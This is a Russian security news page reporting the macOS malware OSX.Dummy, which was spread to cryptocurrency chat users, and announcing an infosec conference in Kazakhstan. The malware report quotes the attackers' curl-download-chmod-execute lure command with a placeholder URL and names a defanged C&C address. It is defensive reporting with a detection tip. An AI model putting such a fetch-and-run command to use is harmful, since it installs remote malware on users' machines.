Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Известный исследователь в области безопасности Патрик Уордл проанализировал новую вредоносную программу для систем macOS, которая атакует криптовалютное сообщество. Вредонос получил имя OSX.Dummy.

«Мне удалось зафиксировать несколько атак на пользователей macOS, они брали свое начало в чатах Slack или Discord, в которых общалось криптовалютное сообщество. В этих чатах люди делятся небольшими сниппетами, чем и воспользовались злоумышленники — вредоносный бинарник загружается и выполняется на компьютерах ничего не подозревающих жертв», — объясняет Ремко Верхов, обнаруживший OSX.Dummy эксперт.

Верхоф уточнил, что люди, маскирующиеся под администраторов групповых чатов, делились небольшими фрагментами кода, который приводил к загрузке и выполнению вредоносной программы. Пример такого фрагмента:

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Уордл отметил, что вредоносный двоичный файл не подписан, это значит, что он будет заблокирован GateKeeper, однако атакующие обошли это ограничение, заставляя жертв загружать и выполнять вредоносный код напрямую с помощью команд терминала.

OSX.Dummy пытается присвоить своему файлу права root, выполнив sudo-команду, однако это потребует от пользователя ввода пароля в терминале. Пароль сохраняется вредоносным кодом в папке /tmp/dumpdummy.

Затем зловред выполняет ряд операций, которые обеспечивают ему укоренение в системе и последующий автоматический запуск.

Вредоносный код также пытается подключиться к C&C-серверу 185[.]243.115.230, используя порт 1337. Если подключение проходит успешно, злоумышленник сможет выполнять команды с root-привилегиями.

«Чтобы првоерить свою систему на предмет заражения этим вредоносом, запустите KnockKnock от root. Ищите неподписанный элемент запуска com.startup.plist, выполняющий нечто с именем «script.sh»», — заключил Уордл.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Код ИБ в начале июня заедет в Нур-Султан и Алма-Ату

Два крупнейших города Казахстана, Нур-Султан и Алма-Ата, встретят международную конференцию Код информационной безопасности в начале июня. Генеральным спонсором конференций выступит компания «Лаборатория Касперского».

6 июня в Нур-Султане в отеле Hilton Astana, а 4 июня в Алма-Ате в Holiday Inn соберутся профессионалы отрасли информационных технологий и кибербезопасности, чтобы обсудить основные угрозы внутренней и внешней безопасности государственных и частных предприятий страны. С докладами в рамках тематических секций «Технологии» и «Люди» выступят вендоры «StaffCop», “SearchInform”, “Falcongaze”.

Фишкой мероприятий станет формат обсуждений узких профессиональных вопросов внутри мини-групп. «Мы планируем организовать свободное обсуждение наболевших проблем среди участников конференции, разбив их на МастерМайнд группы, - комментирует продюсер конференции Ольга Поздняк, - такой формат дискуссии предполагает обмен ресурсами между участниками: знаниями, полезными контактами, личной помощью, своим опытом».

В 2019 году Код информационной безопасности проходит в 5 странах и 23 городах. Участие в конференции бесплатное для сотрудников ИТ- и ИБ-подразделений. Подать заявку на участие в Нур-Султане можно по этой ссылке: https://nur-sultan.codeib.ru/, в Алма-Ате на этом сайте: https://almaty.codeib.ru/

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru